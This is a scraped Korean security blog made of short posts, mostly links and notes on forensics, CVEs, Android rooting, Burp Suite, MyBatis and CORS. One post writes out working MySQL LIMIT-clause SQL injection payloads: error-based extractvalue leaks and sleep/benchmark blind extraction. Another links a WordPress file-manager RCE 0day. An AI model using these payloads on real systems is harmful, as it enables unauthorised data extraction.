Word forensic format

포렌식 2020. 9. 6. 17:42

www.forensicfocus.com/articles/word-forensic-analysis-and-compound-file-binary-format/

 

Word Forensic Analysis And Compound File Binary Format - Forensic Focus

by Arman Gungor Microsoft Word forensic analysis is something digital forensic investigators do quite often for document authentication. Because of the ... Read moreWord Forensic Analysis And Compound File Binary Format

www.forensicfocus.com

 

 

'포렌식' 카테고리의 다른 글

NTFS – MFT 엔트리 구조  (0) 2019.12.05
Magic Number identifies the file  (0) 2019.11.21
블로그 이미지

wtdsoul

,

Bitcoin Remote Dos CVE 2018

CVE 2020. 9. 6. 17:39

blog.saika.kr/2018/09/cve-2018-17144-bitcoin-core-dos-critical-inflation-vulnerability/

 

CVE-2018-17144: Bitcoin Core DoS, Critical Inflation Vulnerability – Saika Blog – 서민교의 블로그

CVE-2018-17144: Bitcoin Core DoS, Critical Inflation Vulnerability by Seo Minkyo · Published 2018-09-24 · Updated 2019-04-02 Intro https://medium.com/@awemany/600-microseconds-b70f87b0b2a6 원문은 여기 CVE-2018-17144는 Bitcoin Core에서 발생한 �

blog.saika.kr

 

 

'CVE' 카테고리의 다른 글

SMB Ghost 취약점 분석(KISA)  (0) 2020.10.14
CVE-2020-1472 취약점 분석 글 (경로 참고)  (0) 2020.10.08
Word press plugin 0day  (0) 2020.09.06
POODLE Attack  (0) 2020.08.09
CVE-2020-0796-RCE-POC  (0) 2020.07.14
블로그 이미지

wtdsoul

,

1. 사용된 변수를 Overwrite 하거나 null로 만들어 초기화 하는 방법을 기본으로 사용함

 

2. 단, String 개게를 이용할 경우 초기화를 진행하더라도 JVM 에서 GC이 일어나기 전까지
메모리 내 평문으로 내역이 존재함

 

3. 해당 String 객체를 null로 초기화 할 경우 객체 Reference 만 null로 만들어 주므로
실제 사용된 데이터는 메모리에 남아있고 GC 시기는 알 수 없으므로 GC 전 Memory dump를 진행할 경우
null로 string 객체를 초기화하여도 해당 데이터는 momory 내 존재하게 됨

 

4. 근본적으로 String 객체는 Overwrite 할 수 없으며 String 객체에 다른 임의의 문자열을
삽입하더라도 새로운 Memory 영역에 해당 데이터를 저장하므로 Reference 만 변경되고 기존 값은
그대로 Memory 내 존재함

 

5. 그러므로 Memory 내 평문 정보가 노출되지 않아야 할 경우 String 객체가 아닌 char[]로
데이터를 저장하고 Overwrite 하거나 null로 만들어야함

 

 

'모바일' 카테고리의 다른 글

안드로이드 NDK 란?  (0) 2020.09.21
 Cydia Impactor alternative  (0) 2020.09.10
모바일 usb 케이블 사용 여부 탐지  (0) 2020.09.06
갤럭시 S7 루팅  (0) 2020.08.24
frida iOS hook  (0) 2020.08.10
블로그 이미지

wtdsoul

,

 

- 모바일 usb 케이블 연결 시

 

USB 디버깅 사용 여부 감지에 대하여 아래와 같이 내용 전달해 드립니다

체크가 필요한 시점에 안드로이드의 세팅 값으로 부터 ADB Enable 상태를 가져와서 체크합니다

 

가져오기 위한 클래스는 아래 링크를 참고해 주세요
https://developer.android.com/reference/android/provider/Settings.Secure

 

가져오기 위한 상숫값은 아래 링크를 참고해 주세요
https://developer.android.com/reference/android/provider/Settings.Global#ADB_ENABLED

 

Settings.Global  |  Android 개발자  |  Android Developers

 

developer.android.com

 

'모바일' 카테고리의 다른 글

 Cydia Impactor alternative  (0) 2020.09.10
메모리 덤프 시 평문 추출 대응 방안  (0) 2020.09.06
갤럭시 S7 루팅  (0) 2020.08.24
frida iOS hook  (0) 2020.08.10
frida 추가  (0) 2020.08.10
블로그 이미지

wtdsoul

,

Word press plugin 0day

CVE 2020. 9. 6. 17:14

github.com/w4fz5uck5/wp-file-manager-0day

 

w4fz5uck5/wp-file-manager-0day

wp-file-manager 6.7 (Aug 2020) Wordpress Plugin 0day - Remote Code Execution - w4fz5uck5/wp-file-manager-0day

github.com

 

 

 

'CVE' 카테고리의 다른 글

CVE-2020-1472 취약점 분석 글 (경로 참고)  (0) 2020.10.08
Bitcoin Remote Dos CVE 2018  (0) 2020.09.06
POODLE Attack  (0) 2020.08.09
CVE-2020-0796-RCE-POC  (0) 2020.07.14
CVE-2019-8805 - A macOS Catalina privilege escalation  (0) 2019.12.10
블로그 이미지

wtdsoul

,

Burp Suite 단축키 관련

2020. 9. 2. 13:01

 

m.blog.naver.com/PostView.nhn?blogId=crehacktive3&logNo=220964754861&proxyReferer=https:%2F%2Fwww.google.com%2F

 

버프 스위트(Burp Suite) 주요 단축키 및 단축키 설정

웹 사이트 진단 시 가장 많이 사용하는 도구가 버프 스위트(Burp Suite)인데 만약 단축키가 없었다면 고...

blog.naver.com

 

Step 1) "Options > Misc" 탭의 "Hotkeys" 섹션에서 "Edit hotkeys" 버튼 클릭
※ 버프스위트 1.7 버전은 "User options" 

 

그림2. Option > Misc 탭

Step 2) 해당 창에서 "Issue Repeater request" 클릭 후 원하는 단축키를 누른 뒤 "OK" 버튼 클릭(필자는 "Ctrl +q"를 하였음.) 

그림3. 단축키 설정창

Step 3) 설정 후 "Repeater" 탭에서 설정한 단축키를 누르면, "Go" 기능이 정상적으로 실행 된다.

이상 버프 스위트(Burp Suite) 주요 단축키 및 단축키 설정에 대해 살펴보았다. 단축키를 사용하게 되면, 단연 작업 속도가 더 빨라 질 것임을 보장한다~!

 

 

 

'' 카테고리의 다른 글

subdomain finder  (1) 2020.10.21
TLS 1.0, 1.1 중단 일정  (0) 2020.10.12
Spring mybatis SQL 인젝션 대응  (0) 2020.08.20
Procedure Analysis SQL 인젝션  (0) 2020.08.13
CORS (Cross Origin Resource Sharing)  (0) 2020.08.11
블로그 이미지

wtdsoul

,

갤럭시 S7 루팅

모바일 2020. 8. 24. 21:11

https://dl.twrp.me/herolte/

 

Download TWRP for herolte

Team Win strives to provide a quality product. However, it is your decision to install our software on your device. Team Win takes no responsibility for any damage that may occur from installing or using TWRP. We recommend downloading the latest version of

dl.twrp.me

https://github.com/topjohnwu/Magisk/releases

 

Releases · topjohnwu/Magisk

The Magic Mask for Android. Contribute to topjohnwu/Magisk development by creating an account on GitHub.

github.com

deliberate-practice.tistory.com/54

 

Magisk를 이용한 안드로이드 루팅

Magisk를 이용한 안드로이드 루팅 Magisk를 이용하여 루팅하는 방법을 알아보겠습니다. Magisk는 /system 디렉토리를 변경하지 않고 루트 권한 획득이 가능하고 Magisk Manager 앱에서 쉽게 다양한 모듈

deliberate-practice.tistory.com

https://dl.twrp.me/hlteskt/

 

Download TWRP for hlteskt

Team Win strives to provide a quality product. However, it is your decision to install our software on your device. Team Win takes no responsibility for any damage that may occur from installing or using TWRP. We recommend downloading the latest version of

dl.twrp.me

 

- G7 루팅 할려다가 엄청나게 삽질을 하여 기록을 남겨둠

- 해당 방법은 안드로이드 8.0에서 진행하였고, Super Su가 아닌 Magisk를 이용한 루팅 방법이다.

- 만약 리커버리에서 나처럼 Super Su 설치를 진행하면 그냥 순정펌웨어 설치하는게 정신 건강에 좋다.

 

G7 TWRP 설치 및 Magisk 설치

 

준비물

G7(SM-G930S), Odin3 v3.13, TWRP, Magisk Manager, Magisk.apk 

 

- 최초 리커버리 이미지 설치 : 볼륨 하 + 홈 버튼 + 전원 버튼 

- 리커버리 접근 : 볼륨 상 + 홈 버튼 + 전원 버튼

 

1. Odin 이용 시 Auto Reboot, Reset Time 제거 후 진행

2. 메인 메뉴에서 Wipe 선택 > 우측 하단의 Format Data 선택 > yes 입력 후 키보드 우측 하단의 체크 버튼 선택

(무결성 검증 때문에 필수)

3. adb push /Magisk-v20.3.zip /sdcard 후 install 설치

4. 리커버리 및 Magisk 설치 후 기기 내 Magisk.apk 설치 

 

- 참고

오딘으로 TWRP를 설치하고 부팅을 하면 순정리커버리로 복원됩니다.
TWRP를 설치할때 오딘에서 Auto Reboot에 체크를 해제하라는게 이것때문이지요.
오딘에서 Auto Reboot에 체크를 해제해도 바로 부팅을 시켜버리면 순정리커버리로 복원되어버립니다.
오딘에서 TWRP를 올린후 바로 리커버리로 진입하세요. 잘못해서 부팅되버리면 도루묵입니다.
이게 어렵다 싶으시다면 CAF Auto Root로 루팅을 먼저 하신후 Flashify 앱으로 리커버리를 설치하는 방법도 있습니다. 

 

 



'모바일' 카테고리의 다른 글

메모리 덤프 시 평문 추출 대응 방안  (0) 2020.09.06
모바일 usb 케이블 사용 여부 탐지  (0) 2020.09.06
frida iOS hook  (0) 2020.08.10
frida 추가  (0) 2020.08.10
iOS (SSL Pinning)  (0) 2020.08.09
블로그 이미지

wtdsoul

,

 

https://sas-study.tistory.com/96

 

Spring mybatis에서 #{ }문법과 ${ }문법의 차이점(feat. SQL Injection)

안녕하세요. 오늘 공유할 내용은 Spring mybatis에서 사용하는 #{} 문법과 ${} 문법의 차이와 ${}문법을 사용했을때 발생할 수 있는 SQL Injection이라는 해킹 방법에 대하여 내용을 공유하고자 합니다. 먼

sas-study.tistory.com

http://apollo89.com/wordpress/?p=2175

 

mybatis sql injection 취약점 » Apollo89.com

Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니��

apollo89.com

- 입력 값을 반드시 검증 후 사용

- $ 파라미터 대신 # 파라미터를 사용

 

'' 카테고리의 다른 글

TLS 1.0, 1.1 중단 일정  (0) 2020.10.12
Burp Suite 단축키 관련  (0) 2020.09.02
Procedure Analysis SQL 인젝션  (0) 2020.08.13
CORS (Cross Origin Resource Sharing)  (0) 2020.08.11
DNS Rebinding 을 이용한 우회  (0) 2020.08.10
블로그 이미지

wtdsoul

,

 

https://tempuss.tistory.com/entry/Limit-%EC%A0%88%EC%97%90%EC%84%9C%EC%9D%98-SQL-Injection

 

Procedure analyse()를 이용한 SQL Injection

[LIMIT {[ offset ,] row_count | row_count OFFSET offset }] [PROCEDURE procedure_name ( argument_list )] [INTO OUTFILE ' file_name ' [CHARACTER SET charset_name ] export_options | INTO DUMPFILE ' fil..

tempuss.tistory.com

https://www.hides.kr/284

 

Limit 구문에서의 SQL Injection

rubiya의 LOS 를 풀다가 알게된 기법을 적으려 한다. 이 기법은 사용자의 입력값이 아래와 같이 LIMIT 절 다음에 들어갈 시 사용할 수 있는 취약점이다. SELECT * FROM member WHERE id='guest' LIMIT {user input..

www.hides.kr

참고

CTF가 아닌 현업에서 실제로 실행된 사례가 있어서 참고함

 

 

그중에서 사용되는 함수는 다양하지만

extractvalue()라는 함수가 있습니다.

 

mysql> SELECT * FROM user WHERE id='admin' limit 1 procedure analyse(extractvalue(1,concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.1.41-community' mysql>

 

이렇게 하면 version을 뽑을 수 있습니다.

그 외에도 information_schema에 접근하여 DB와 테이블명에 대해서도 뽑아 올 수 있습니다. 

 

쿼리)

procedure%20analyse(extractvalue(1,concat(0x3a,version())),1) 

 

 

- error base

mysql SELECT id FROM test WHERE id='admin' limit 0,1 procedure analyse(extractvalue(1, concat(0x3a, version())), 1);

ERROR 1105 (HY000): XPATH syntax error: ':5.1.41-community'

 

- blind

mysql > SELECT id FROM test WHERE id='admin' limit 0,1 procedure analyse(extractvalue(1, concat(0x3a, (if(mid(version(),1,1) like 5, sleep(5),1))), 1);

 

 

limit 1 procedure analyse(extractvalue(1,concat(0x3a,if(ascii(substr(version(),1,1))>10,sleep(1),0))),1);

-> Only constant XPATH queries are supported

sleep 함수대신 benchmark 함수를 써본다.

 

limit 1 procedure analyse(extractvalue(1,concat(0x3a,if(ascii(substr(version(),1,1))>10,benchmark(1000000,sha('a')),0))),1);

 

성공적으로 시간지연이 일어나고 한글자씩 추출해낼 수 있다.

 

 

'' 카테고리의 다른 글

Burp Suite 단축키 관련  (0) 2020.09.02
Spring mybatis SQL 인젝션 대응  (0) 2020.08.20
CORS (Cross Origin Resource Sharing)  (0) 2020.08.11
DNS Rebinding 을 이용한 우회  (0) 2020.08.10
Web Assembly 시작  (0) 2020.08.09
블로그 이미지

wtdsoul

,

https://medium.com/@woody_dev/cors-cross-origin-resource-sharing-cea401fb79b6

 

CORS(Cross Origin Resource Sharing)

CORS란 무엇인가?

medium.com

 

 

CORS(Cross Origin Resource Sharing)는 브라우저가 XHR(XMLHttpRequest)을 이용해 Cross-Origin 요청이 가능하여, 서로 다른 도메인(사이트) 간 자원을 공유할 수 있게 해주며, 특정 조건들이 만족할 경우 동일 출처 정책(SOP : Same Origin Policy)에 의한 제한을 완화하는 데 사용될 수 있습니다.

 

 

동일 출처 정책(SOP : Same Origin Policy)은 보안 상의 이유로, 브라우저들의 스크립트 내에서 초기화되는 cross-origin HTTP 요청을 제한하는 것으로 다른 웹페이지에서 접근할 때는 동일한 출처, 즉 프로토콜, 호스트명, 포트가 같은 웹페이지에만 접근이 가능합니다. 예를 들면, XMLHttpRequest는 동일 출처 정책을 따르기에, XMLHttpRequest을 사용하는 웹 애플리케이션은 자신과 동일한 도메인으로 HTTP 요청을 보내는 것만 가능합니다. 즉, 웹페이지의 스크립트는 그 페이지와 같은 서버에 있는 주소만 ajax 요청을 할 수 있습니다.

 

 

 

'' 카테고리의 다른 글

Spring mybatis SQL 인젝션 대응  (0) 2020.08.20
Procedure Analysis SQL 인젝션  (0) 2020.08.13
DNS Rebinding 을 이용한 우회  (0) 2020.08.10
Web Assembly 시작  (0) 2020.08.09
Oauth 개념과 원리  (0) 2020.08.09
블로그 이미지

wtdsoul

,